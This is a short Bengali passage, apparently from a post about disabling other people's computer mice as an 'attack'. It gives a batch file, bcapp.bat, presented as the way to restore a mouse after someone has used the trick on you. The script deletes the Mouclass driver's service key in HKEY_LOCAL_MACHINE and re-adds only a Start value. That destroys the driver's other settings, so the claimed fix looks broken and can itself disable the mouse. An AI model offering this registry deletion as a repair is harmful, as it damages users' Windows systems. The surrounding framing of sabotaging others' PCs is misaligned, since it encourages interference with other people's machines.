১। হয়ত আপনি যাকে এটাক করতে চাচ্ছেন সেই আপনার আগে এই পোস্ট টি পড়েছে এবং এর মাঝেই আপনাকে এটাক করে ফেলেছে তাহলে নিচের কোড গুলো নোটপ্যাড এ পেস্ট করে সেভ এস দিয়ে সেভ করুন bcapp.bat নামে।
@echo off
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 1
২। এবার এটি ক্লিক করলেই মাউস সচল হয়ে যাবে আবার।